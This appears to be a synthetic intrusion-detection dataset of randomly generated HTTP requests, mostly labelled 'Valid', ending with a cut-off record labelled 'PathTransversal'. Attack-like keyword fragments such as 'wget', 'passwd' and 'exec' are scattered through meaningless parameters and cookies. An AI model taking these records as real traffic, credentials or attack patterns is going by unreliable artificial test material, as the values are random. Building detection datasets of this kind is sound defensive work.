~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

kzZSOPfromi0.-4=hat&ueisvte3rs=wsvi&tkond7oq=eFlaay|twT

End - Id: 48210
Start - Id: 20276
class: Valid
GET /AisjUcptpZrmhsl1i1/y6l.1xFjG-iEcrnv4ee/dI6EfWBU1iQ.ge2qwfn/9ywchild/rntrAwtlm/tOtd1l.4H1ju8A/bhYvHgxIviu9SZVkmqrg/Vyxtermwget0OCDnull/hEd/o4A5/osghx-YhC3lW0.png? HTTP/1.0
Host: 26.196.198.146:25242
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp;q=0.2, hz-gb-2312
Accept-Encoding: 
Accept-Language: seoed0iB-oeC, 7tNxcx-ttneshd, d-a
Cache-Control: max-stale=84
Client-ip: 21.43.27.67
Cookie: pab=H)2 2m ;feilesirr05c=kg4 having;tnN=r1dtreplaceemlexecmazt;die=te;aaaUnom2th=sf-D9b;t6fchwbesqlh=ncsno=nm
Cookie2: $Version="235"
Date: Thu, 23 Jun 05 03:02:17 GMT
ETag: W/"GaGJnzog2Z7mqcrS0jW"
Expect: 100-continue
From: OolLe3@sxRs.net
If-Modified-Since: Fri, 22 Jul 05 17:08:57 CET
If-Unmodified-Since: Wed, 23 Jan 08 08:14:33 CET
If-Match: *
If-None-Match: "ILnLTVNZFZg_DFp"
If-Range: "FYFpskIWO_O.2WQpIB"
Max-Forwards: 7597
MIME-Version: 1.5
Pragma: it=egOsew5e
Proxy-Authorization: NTLM Y25lYWFlZXJybjZHZXNkYXRzY21ld2VvZG5zOHVhaGRseGVmZWVodGd3c29lbA==
Authorization: Basic YnRyZXlvOmE0NG9udA==
Range: 2-254176
Referer: http://aiai.org/aEecng/Lxniabse/gqsedhs/pemu9Sos/ieonj.css
TE: trailers,deflate;q=0.5
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.2 (Windows; U; Win 9x 4.7; ht-gV; rv:0.4.6) Gecko/71896312
UA-CPU: MIPS
UA-Disp: 161,462,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0564x652
Via: 8.0 www.chiihwot.jpeg:58
Transfer-Encoding: poeuNo
Upgrade: eCc/4.2, tne/4.8, kdeqH/8.0
Warning: 058 www.eyes9l.tiff "iseRqeh6t" 
X-Forwarded-For: 97.185.253.211
X-Serial-Number: 11361465282
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20276
Start - Id: 25280
class: Valid
GET /re4pfdemigfpgrSte.mdb?l8JH=siinclude&f4rdhws=867955&W4.6divLMdz@Y=Eng&evJn7haEfjJS=2wvddTeR&pftt35Ento=88853 HTTP/1.1
Host: www.inwvEhra.gov
Connection: keep-alive
Accept: application/*;q=0.7, application/zip
Accept-Charset: iso-8859-15, x-mac-japanese;q=0.4, iso-2022-kr;q=0.8, iso-2022-kr, x-mac-hebrew
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=2
Client-ip: 219.246.136.81
Cookie: c0Eei2ciecWeca=anWFaQzqUv
Cookie2: $Version="10"
Date: Mon, 29 Jun 09 11:30:21 GMT
ETag: "XR9yYgKkJC90Wjz"
Expect: 100-continue
From: tgej@l4Mpeyut.cz
If-Modified-Since: Tue, 22 Jul 08 21:48:14 UTC
If-Unmodified-Since: Wed, 24 Jan 07 02:22:57 UTC
If-Match: "VA540TAkfkNT7rSS-kK"
If-None-Match: "u5mLJYrg-jGQzbw4s"
If-Range: Thu, 24 Sep 09 14:42:00 CET
Max-Forwards: 0077
MIME-Version: 4.0
Pragma: Oa='C'
Proxy-Authorization: NTLM aTlvbWlCUmphWlRkbmdlcWxqMml5dWl0aWF0ZTI2YWhmTGZjc2FzbnRlbGEzTg==
Authorization: Digest response="fe58E2ff7C5fB02822635c5481Dcfa37"
Range: 04-39299,179937-1471,76-
Referer: http://ja3Mg.uk/tldfe/eosRy0u/oHhaat.pl
TE: deflate
Trailer: Trailer
User-Agent: gear (t1rw@dHa-H; iN-fFIql9E; mfdPVmH; eu3Os87dE)
UA-CPU: Sparc
UA-Disp: 8204,1865,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4028x8502
Via: 1.2 www.p5esshkd.jpeg
Transfer-Encoding: identity
Upgrade: smn6/9.9, tqura/5.8, omdo/1.2, eil2/4.6
Warning: 741 4.215.113.72 "rtadv" "Sun, 22 Aug 04 14:34:46 UTC"
X-Forwarded-For: 249.207.205.242
X-Serial-Number: 139373036597408522
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25280
Start - Id: 23004
class: Valid
GET /vV8C94BLo7O.i/ioryh2dht4d/bquowej/f2omee3dnse8t/5zhttEAjeirl/sta5aLrdo/iWRx_JEDc/ceNHEjsju6/4n.ra..TiUdeeH.mdb?cr=DnAn3aetEeowtSt&iw2a5m4hpehYpAs=9724&kcdltqric=xaEdrut&me0teade3a=alBPGPWKsI0&ne=mYci HTTP/1.0
Host: www.ergtkieei.biz
Connection: close
Accept: text/*, text/plain
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=80
Client-ip: 122.210.73.33
Cookie: z7pelneo=erzAYlvEBT7;nE=2ftpf;reee=sic\node;4B7umP2= tcH
Cookie2: $Version="26"
Date: Sun, 22 Apr 07 12:56:37 CET
ETag: W/"m2_.s_g7jYk-ibNrreCH"
Expect: 100-continue
From: reCec@atistonN.com
If-Modified-Since: Sat, 26 Jan 08 23:20:55 UTC
If-Unmodified-Since: Mon, 17 May 04 13:21:21 UTC
If-Match: "mWnKPGxRkbeFRJ2_47_-"
If-None-Match: "YeHDsws_UvkH4Si"
If-Range: Mon, 08 Sep 08 11:50:05 UTC
Max-Forwards: 0824
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: fmr5 Ld67ld=n9o0r
Authorization: Omro07 arelmOi=Nuwnav
Range: 46141-509,21195-,-1
Referer: http://www.nydhinns.fr/holItT.png
TE: trailers,chunked
Trailer: Range
User-Agent: Mozilla/4.2 (Machintosh; U; PPC 3.1; zE-x6; rv:2.9.7) Gecko/68945345
UA-CPU: MIPS
UA-Disp: 4117,1833,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 465x0327
Via: 3xItr/8.0 177.160.69.52, 0.8 www.bryJ3eP.css:99743
Transfer-Encoding: identity
Upgrade: yhIHx/5.5
Warning: 344 200.127.208.91 "smpnteri811ahRiatlo" 
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 782598520003
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23004
Start - Id: 32289
class: Valid
GET /hL69haiEthdl/BY/pjaEH73NKxEKE/p-maF/F29/oX_kj9/ceIhtdgniodsa/t-j/stNhd0okyO5ZabJ/lansayo6nlaelar4r/y9CBPA5/tctp.bin?ceeii=cyheasy&lteJ1tdqauhdhi=scnhneceh6bqYbe&9eire5Hu8ntz1nc=ue4gh&demHnIfm=ak7Nnq HTTP/1.0
Host: 192.117.27.155:1226
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.2
Cache-Control: max-stale=14251
Client-ip: 51.53.237.152
Cookie: oehdaanm= |;cvuofeykst2=kBX;ah2rota=t\uanehp8mLtnx;fdaIre1r=s;;ta5senuarruwTT=7576
Cookie2: $Version="02"
Date: Tue, 22 Apr 08 20:11:31 GMT
ETag: "5PC@hhpJ@Jsu8Oiv"
Expect: 3zih
From: mnonn5h@wlv1.be
If-Modified-Since: Mon, 13 Dec 04 02:38:21 CET
If-Unmodified-Since: Mon, 12 Apr 04 17:34:27 CET
If-Match: *
If-None-Match: "5qeLmrsRInnoAhazg7"
If-Range: Fri, 30 Jul 04 15:18:12 GMT
Max-Forwards: 2777
MIME-Version: 9.5
Pragma: le8tefn='nyek'
Proxy-Authorization: eqcroe eh0ts=bnu9dnt
Authorization: orC5 4uen4ieR=bqbG8
Range: -05910,24859-707033
Referer: /0Sviey/to9a/9pnck/dtiR.bin
TE: trailers,trailers,deflate;q=0.5
Trailer: Date
User-Agent: Wrhht0/9.2.1.3
UA-CPU: x86
UA-Disp: 096,809,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3225x292
Via: HTTP/3.3 144.1.109.82
Transfer-Encoding: gzip
Upgrade: dez0/2.0, eml/6.2, 94sbmu/6.4, or3yiw/7.8, ushA2/0.7
Warning: 188 128.175.35.78:84438 "S5oiobSrnbBr6fnyRoo" "Thu, 12 Oct 06 18:58:00 GMT"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 7859774427
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 32289
Start - Id: 1562
class: Valid
GET /bUmkpJAP8hFcCMyepbM/7Pc2rkpjqFCC9oMIsR.jsp? HTTP/1.1
Host: www.emwycgls.it:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: e=oe
Client-ip: 139.146.235.78
Cookie: enoI4tptdneeoaU=17104180;reYWt=6;hLii=teYhnndmsvtvde8tn
Cookie2: $Version="4"
Date: Wed, 03 Jun 09 23:21:51 UTC
ETag: W/"TcNTBE.hnvT-fkK"
Expect: uumaob=nye0d
From: tyoranj@tial.uk
If-Modified-Since: Fri, 03 Aug 07 13:37:46 CET
If-Unmodified-Since: Wed, 20 Jan 10 01:32:25 GMT
If-Match: "eFzV2rRSGRFQUCW"
If-None-Match: *
If-Range: "Wvd95.lJNCecu2hKSro"
Max-Forwards: 668
MIME-Version: 1.8
Pragma: Geud='5s4a'
Proxy-Authorization: Basic OGRhc3J0Y3Q6UmVlVHk=
Authorization: NTLM d2Vvb2VyUnRmaUV0TXNoRGVrNG9hanJQdXNsdHBSaG9oZXNlNGlieWpscmI=
Range: -7,52718-,3057-736702
Referer: http://tDat.net/efm0dy.rar
TE: trailers
Trailer: Accept-Language
User-Agent: eqsj1JtkIH http://www.xFen.uk
UA-CPU: StrongARM
UA-Disp: 048,2159,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7934x8697
Via: FTP/4.2 www.eieCar5.js, 6.6 www.espek2.html, 2.5 www.Ltmteern.jpeg
Transfer-Encoding: gzip
Upgrade: tbn/9.6, 9ao/1.1
Warning: 565 www.oaie5.css "3h4i3dbeiaed6iodoqtr" "Thu, 25 Dec 08 10:23:34 CET"
X-Forwarded-For: 36.197.187.144
X-Serial-Number: 2858071636366715430
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1562
Start - Id: 33724
class: Valid
PUT /nntn7Hoepceq/wihfstooncahteote/bvV.html? HTTP/1.0
Content-Length: 142
Content-Language: 2l
Content-Encoding: gzip
Content-Location: /4usfud/tEio/gRIrs.php3
Content-MD5: ZWwzaG5ldkU5bnhpbncycw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Nov 09 10:26:48 GMT
Last-Modified: Mon, 06 Jul 09 06:25:06 CET
Host: www.Tvdauerc.ch
Connection: close
Accept: */*
Accept-Charset: windows-1253
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 178.20.130.175
Cookie: rmnaenoln1srl=3126306;ol893n9oi=i200A;mebweieotneoe=sCQHmr;et=tdAG
Cookie2: $Version="09"
Date: Fri, 16 Oct 09 08:55:47 UTC
ETag: "Nyk.tdd8xGa5-nMk"
Expect: 100-continue
From: eSwnhmt9@baaeh4uleA.net
If-Modified-Since: Tue, 28 Feb 06 09:41:44 GMT
If-Unmodified-Since: Thu, 05 Feb 04 16:44:04 UTC
If-Match: "3NCNo2D1lj0Q1t3E"
If-None-Match: "C_@qZI7zF0GhuFU3n"
If-Range: *
Max-Forwards: 27
MIME-Version: 5.8
Pragma: e8oo1=lnqner
Proxy-Authorization: Digest nc=5fd1B4Da
Authorization: Digest algorithm=45Cpi3ns
Range: 666-,61-39
Referer: http://www.ee5Neiii.org/eteoEs.ace
TE: chunked
Trailer: Max-Forwards
User-Agent: Mozilla/2.0 (Windows; U; Win98 1.1; dH-41; rv:5.7.2) Gecko/84588210
UA-CPU: StrongARM
UA-Disp: 9133,083,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 520x205
Via: 8.1 4.34.233.82, 6.1 245.224.38.40:85, FTP/1.0 226.26.118.28:804
Transfer-Encoding: sdCit; f6qrph=d62ar6ld
Upgrade: ooa2tm/7.4, 7oOba/8.2, ars/2.1, orwr9A/7.4, adT/4.5
Warning: 146 www.heyaohc7.png "iqTeaiaieCen" "Thu, 28 May 09 11:14:53 UTC"
X-Forwarded-For: 145.242.152.101
X-Serial-Number: 695598853636
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oihhedehwnr7nru=666875987&AoeF0pPWf6fromQ=tAYjGATTEvj&onugonteqbedoad= nph-&thiswc6=telnetnulle/i6Wc&tssfyTmedi=5986106&tGlnkhoaues=ndUUkQ9e

End - Id: 33724
Start - Id: 6889
class: Valid
POST /childASKwxp_.html? HTTP/1.0
Content-Length: 68
Content-Language: Nm,kl,eqai5
Content-Encoding: gzip
Content-Location: http://www.mu3ne4i.biz/urY7dth/tETaa/ein1t.nsf
Content-MD5: b2VBM1V5YnN0cG9pcmx4cw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Jun 08 19:38:32 CET
Last-Modified: Wed, 13 Dec 06 24:02:01 UTC
Host: 179.13.88.216
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: compress;q=0.7, identity, gzip, compress;q=0.2
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 41.32.239.153
Cookie: 6eshdtEqspf5r=rim@ND4yRG;jLRrmQES3Q7=NlDnisanaeper;atonfeehvennd=LenRlSotlnGter5shf;Ti15e8c4lneoioa=05;nLdamsTi2=8
Cookie2: $Version="460"
Date: Sun, 16 Nov 08 09:42:02 CET
ETag: W/"Y6N0NUinwp3pNl1Hx"
Expect: onEoapn4=rlrg5;xate=bhaeer
From: 1m1ll@ibidpns.org
If-Modified-Since: Wed, 01 Dec 04 23:01:59 GMT
If-Unmodified-Since: Wed, 06 Jan 10 15:14:11 GMT
If-Match: *
If-None-Match: *
If-Range: "5s827xxx7BPGnliD0Y3"
Max-Forwards: 549
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://nsa5.net/jIlhTi.rar
Authorization: Digest uri=http://OlaAek.com/gd3tit.sh
Range: 326-
Referer: http://www.rm1e6.com/aejtts/4uwso0U/etbe/6sthtxst.txt
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: fvyV9_kt http://www.ienlsw.uk
UA-CPU: x86
UA-Disp: 6111,6409,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 496x5279
Via: 3.2 9.45.78.208, HTTP/4.9 202.245.253.22
Transfer-Encoding: hrtk
Upgrade: nw4c/8.2
Warning: 696 www.3huacir.htm "ddift7e" "Sun, 09 Oct 05 02:50:01 UTC"
X-Forwarded-For: 190.214.54.84
X-Serial-Number: 65434343667649
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

BP1A=967508763&wototk=6782928193&asevn=Inqhwp-is&T5QuOxfIP@like=8095

End - Id: 6889
Start - Id: 15262
class: Valid
GET /s-m_T73zD/9@F/oUG4E0MDMjc.zv-n/h3DHA4Y0BUS2eSL0/mjQ@0-L-vO28U42Z/1cazmtoesoedlmgiow4/oslorcuRS4s5EabejnAj.htm?JPbgsound96Qp=tatbemwa&sdycE4oh=sncd&2ohotbnfyoruo=stylereUnnopAdesystemeilsN&toaneb8osbIih=execou1rt&lhirsdde=ta%7EetopenmsdgYeirI%29hSd&Sopb93rp=21644&dxahrelffso=23NkFHYJ&K7Nopen=oe8+&flvtr=bmtiuw&hOe6hi5dp=lleseyia&maiessppirh8lrn=dtiuoegaAf6oWG HTTP/1.1
Host: www.bitss.org
Connection: runGmsn2
Accept: audio/*
Accept-Charset: x-mac-arabic;q=0.3, utf-8;q=0.0, cp-932, x-mac-arabic
Accept-Encoding: *
Accept-Language: hat-We, ncepiyr-taudOs, 6rest-6O5;q=0.5, aac-d, kri-ltl;q=0.7
Cache-Control: no-cache
Client-ip: 146.193.75.117
Cookie: hp=79077;dahjleleag=1Iadizimcfre;5sui9ns=cNk2onfaeeqpeit;elev9niohed=n;frto=qn9rfab9toeetnbgfi
Cookie2: $Version="604"
Date: Fri, 12 Mar 10 01:51:31 CET
ETag: W/"Cygi3fqm9GyaWa2"
Expect: 8oNm=hcoe0
From: roOtew@itmi.com
If-Modified-Since: Thu, 27 May 04 16:04:58 GMT
If-Unmodified-Since: Thu, 04 Mar 10 21:24:49 CET
If-Match: "HPc-X_PMIr8m0YBas"
If-None-Match: *
If-Range: Wed, 15 Nov 06 12:28:26 CET
Max-Forwards: 0044
MIME-Version: 3.7
Pragma: wwi='nosioddl'
Proxy-Authorization: Digest cnonce="ahrdT"
Authorization: Digest nonce
Range: 70862-
Referer: /22nf6nr/B81ho9/ittdnFoe/iyatD.css
TE: deflate;q=0.1
Trailer: From
User-Agent: iroIo6/2.0.6
UA-CPU: PowerPC
UA-Disp: 681,9918,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 175x9558
Via: ussFo/0.6 181.40.152.148:5707
Transfer-Encoding: deflate
Upgrade: b6ii0/3.3, tteonn/2.3, yey/0.7, ic6n8/2.9, a0t/1.3
Warning: 019 www.wlaLP.png "ndRtmrHiahcCIolrn" 
X-Forwarded-For: 231.138.207.226
X-Serial-Number: 82459741903687
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15262
Start - Id: 33921
class: Valid
PUT /oEfnt/1QU0Py/ocetrnwmYstCi/h3tnmoa1l/gagt6/w9l53/icL3mg5aq@b/ljA7R_VGIzSXr9_2X.tiff? HTTP/1.1
Content-Length: 108
Content-Language: riiOu
Content-Encoding: gzip
Content-Location: /rteo/dEft/HgDk.exe
Content-MD5: dGFuYWM4ME9TMXBldXJjdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Feb 10 01:36:55 UTC
Last-Modified: Sat, 04 Oct 08 13:36:51 GMT
Host: 154.5.196.144
Connection: close
Accept: audio/x-wav
Accept-Charset: iso-8859-6;q=0.5, windows-874, windows-1253;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-age=40353
Client-ip: 248.12.106.141
Cookie: qyfs=Spasswdeejwsa%hchildar;Twindow.openBnk=2751
Cookie2: $Version="05"
Date: Wed, 28 Jan 04 02:50:01 UTC
ETag: "sBOIf.P@_4EIFh0Y"
Expect: lvajgktw=lneekEao
From: faUspl3@yqiAa4o.it
If-Modified-Since: Mon, 23 May 05 21:07:02 CET
If-Unmodified-Since: Tue, 15 Feb 05 19:15:42 GMT
If-Match: "Ao@mL.urI.OIcudWgl"
If-None-Match: "Uqf5BzC_d8KCgYWOJHyM"
If-Range: *
Max-Forwards: 80
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: ddre3t eDfhi=ueIeutii
Authorization: Basic M2ZyNGhwNmw6ZXNjcHJsb3A=
Range: -996,858-589875
Referer: http://izamscc.fr/xuch7RiH/TaMti7he/9epTu/bydCon.sh
TE: chunked;q=0.6
Trailer: Connection
User-Agent: Mozilla/3.7 (Windows; U; Win 9x 5.8; nn-tp; rv:4.1.7) Gecko/37099366
UA-CPU: Sparc
UA-Disp: 4653,644,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1982x002
Via: od4Ety/8.5 www.Naotmao.css, FTP/8.0 www.pzehe.jpg, nha4oy/4.2 www.q4siadt.css:91
Transfer-Encoding: gzip
Upgrade: 3upaeo/9.1, 7ei/4.0, fTrr0/5.4, chi/4.6
Warning: 795 168.131.85.71 "htNrsta0stixj" "Thu, 18 Mar 04 22:40:39 GMT"
X-Forwarded-For: 7.63.26.112
X-Serial-Number: 346952667269
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ZmcatJyVZO=ap&ze7i=i\6i&7edS=w3Pl3oMi&rm5ocbintl=onA&27sE915e@Kn=n&ee=3eiah&UKMopt=quo&idh=rh&tJleudrh=e8L

End - Id: 33921
Start - Id: 28699
class: Valid
GET /olpbnDy22Zvl/t2v5jlWxwhQi5/oaxuLntii/eHMNZL/bDJOmq/msr/iX74j8/sEpmefhhswnTm/zq/mrDuY3bEjX.gif? HTTP/1.0
Host: www.tEin6zpsf.net
Connection: close
Accept: text/plain
Accept-Charset: *
Accept-Encoding: identity;q=0.0, gzip, gzip;q=0.0, identity;q=0.4
Accept-Language: 0r8s-henSresL;q=0.0, hf-4t0ueo;q=0.4, tiai1-nrT1aooE;q=0.5, eaab5ib-hO, bwle-2tmh
Cache-Control: lc=st
Client-ip: 80.241.83.170
Cookie: diuo=iyiQv6FgCC9p
Cookie2: $Version="41"
Date: Mon, 28 Dec 09 05:14:15 CET
ETag: "EsNhD0x-L@yMl16"
Expect: Acbne=4eswnec;iheie1
From: hoetolhz@mgi7iNed.uk
If-Modified-Since: Fri, 08 Aug 08 04:25:38 UTC
If-Unmodified-Since: Tue, 03 Aug 04 22:19:14 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Nov 08 10:58:54 UTC
Max-Forwards: 8
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest response="402fAbe20bCA7521de8FBa324bDF8Af8"
Authorization: Digest uri=http://a5hemp.biz/lOou4/hetqu/Sblr9ecp.txt
Range: -440021
Referer: /5eucibd/8we9sn/l56c.php
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: tstaeehIa/2.5.6
UA-CPU: 68000
UA-Disp: 7978,1841,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 621x541
Via: 6.4 28.151.233.53
Transfer-Encoding: identity
Upgrade: mptnoI/0.5, iTp4m/8.4, 0hyWd/3.5
Warning: 669 www.arAn.jpg "e3btqt7scal3asb" "Tue, 04 Nov 08 19:20:43 GMT"
X-Forwarded-For: 70.75.45.186
X-Serial-Number: 244229732731
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28699
Start - Id: 27012
class: Valid
GET /oV3j1dKQyK6LNT6Qfgq/81h9NJl7q-_JFyDl/g_6.Q/7KrkiOo7apasswdaY/hjenn2uitlfttuewenew/fmG4wT/ftt0wodhot/no_eb-2XNFgUY/o0eeY65ikt5/dY_KdIL/or0y8AQ.b-Ae8h.bin?BF0_aEQ1DzBI=stuaoad&sarouosaaeTts=164944&D9=610847&Csf6habuocsb=nldap&ri=r&nKc=0eyprocessing-instructionnc35mn HTTP/1.1
Host: www.eefaucAe.uk:80
Connection: lroal0i
Accept: video/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 202.222.48.227
Cookie: ntiolc0rtogsGit=zm0J
Cookie2: $Version="7"
Date: Wed, 25 Jun 08 18:43:47 UTC
ETag: W/"xr5ltJLATm0k7Up8"
Expect: tncr=iroe;uoonohpD
From: erxoee@uwm9y1m1lh.net
If-Modified-Since: Mon, 30 Jul 07 14:07:08 GMT
If-Unmodified-Since: Fri, 06 Feb 09 07:47:06 CET
If-Match: *
If-None-Match: "38Ni.xdRA8jdtKDx"
If-Range: "TCssNxGZzB.wgu.AA"
Max-Forwards: 2659
MIME-Version: 1.2
Pragma: gviseh5=1stbue
Proxy-Authorization: Basic b3RuaWFSYTpodG5vdGk=
Authorization: Basic blVtaWY2ZTplaDFzbA==
Range: -2,41933-,520-237717
Referer: http://www.aeey.biz/dt9i.tar.gz
TE: chunked,chunked,trailers
Trailer: Connection
User-Agent: Mozilla/5.6 (Machintosh; U; PPC 9.7; aa-eb; rv:9.7.9) Gecko/82999317
UA-CPU: StrongARM
UA-Disp: 9952,4769,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6860x985
Via: 2.1 www.o4lr.tiff:4, HTTP/5.3 www.cegd.jpg
Transfer-Encoding: deflate
Upgrade: rt4na/4.6
Warning: 866 www.tvytE8.tiff "nAg6tTeeSfegQmnsr" "Fri, 23 Jan 09 21:23:14 GMT"
X-Forwarded-For: 41.72.7.124
X-Serial-Number: 044628403865757312
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27012
Start - Id: 27692
class: Valid
GET /bZN0-SwB/tHwA/xSb/2V/SoymrtnthhoaHnde/hpsOJ/u6Z6SQO5-mpN55U/t24T.sOZWp8DUKeDFyGF/tZNLQ/en/e_Yu.exe?nZ_d-psOjG2a=86166&tb=tbq&sdnehns=382508&vrrmnxqttou9nu=718&afai4ftaee=84198&epre=e+e%26u%28%3Eee&pCecoYam=e+hO7s%7E%3Aunionnautoexecwwinntmel HTTP/1.1
Host: 183.84.245.232
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: Aeozv-e6ddee5i;q=0.3, aeDav6-a5m0nto, wutoSs-rnOmt;q=0.8, n3aast6-wwseei;q=0.6
Cache-Control: max-age=458
Client-ip: 120.133.227.232
Cookie: yD9K=822422;jpVu=381623;anm=eoWY8J-nt6Vh;16ereesmhitnD=3
Cookie2: $Version="09"
Date: Sun, 21 May 06 07:03:16 GMT
ETag: W/"jjbn.BcKvzk8oUEXzB33"
Expect: ee4re=lemXfen
From: bTem2@peiaee.st
If-Modified-Since: Fri, 09 Jan 04 08:04:15 UTC
If-Unmodified-Since: Tue, 31 Jul 07 10:50:10 UTC
If-Match: "6QJKXTPc4d3u8@V"
If-None-Match: *
If-Range: "tL4rfsf_GlDNJMJ"
Max-Forwards: 559
MIME-Version: 9.8
Pragma: t='u0t5n'
Proxy-Authorization: Basic b3BhdW02YWw6dmNoaw==
Authorization: NTLM c3RzTGhldXNlaEVuNHdvU3NzYkM0d3l6WWVmZWVlbXVkMjRpbXll
Range: 19057-557
Referer: /Nlw1u6/magn.swf
TE: deflate;q=0.8,chunked;q=0.8
Trailer: Range
User-Agent: Mozilla/1.4 (compatible; Konqueror/4.5; Win98; tihategmgr)
UA-CPU: PowerPC
UA-Disp: 9899,7417,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 576x948
Via: wxdlgt/6.3 www.arsi.shtml, HTTP/4.6 www.t4hti.tiff, FTP/4.0 www.eeypi.png
Transfer-Encoding: identity
Upgrade: 7tihjo/8.0, sel/5.7, yAiesw/1.4
Warning: 853 www.ne9heunk.jpeg "jt0uaenrtwnLgah3l" "Sun, 30 Sep 07 15:57:29 GMT"
X-Forwarded-For: 24.95.0.215
X-Serial-Number: 9842192214995
----: -----------
~~~~~: ~~~~~~~~~~

null

End - Id: 27692
Start - Id: 32267
class: Valid
GET /5GCni-uMI1TjV755/y@ZvO5gHa1Y.png?eteoh75=4ti%40n4atasystem&dnse4oafpem=wUCV6SsFeIdY&OtTellou=8009603842&Dneotae=9366236&onrkRtpitoyt=q2HPuPtnd HTTP/1.1
Host: www.tlAmtnOyie.ch
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-cyrillic, iso-8859-7;q=0.9, x-mac-roman
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 38.26.20.181
Cookie: hieegEeS=trotr6eusrnntRun
Cookie2: $Version="518"
Date: Mon, 07 Jul 08 12:45:23 UTC
ETag: W/"Atfw@xh8-ov-YUnl"
Expect: 100-continue
From: reTalc0@UoiRxreIr5.uk
If-Modified-Since: Tue, 05 Aug 08 13:22:12 UTC
If-Unmodified-Since: Thu, 12 Apr 07 08:18:19 UTC
If-Match: "40W3LnxLbCy9r0jMO"
If-None-Match: *
If-Range: Sat, 08 Aug 09 20:03:40 UTC
Max-Forwards: 6931
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: srie 7y85rp=eaTsher
Authorization: Digest response="482f1eAbd1B2B96e5c25E88bC3dfDCBE"
Range: -265,3-,-2
Referer: http://adtkn.cz/bUOyoYD/zsrda/Noe8U0/eihe/olEu.sh
TE: chunked;q=0.4,chunked,deflate
Trailer: Trailer
User-Agent: oRc-ipZk http://www.viqtr9.uk
UA-CPU: StrongARM
UA-Disp: 8350,6514,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3225x292
Via: HTTP/8.9 www.sebtaf.gif
Transfer-Encoding: deflate
Upgrade: igmn0b/4.9, aorfth/1.2, srr/7.4, mp7/8.9, npq/6.9
Warning: 276 144.197.192.204 "hsEwst6bs9l" "Wed, 19 Mar 08 20:42:32 GMT"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 1249637352936
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32267
Start - Id: 46030
class: PathTransversal
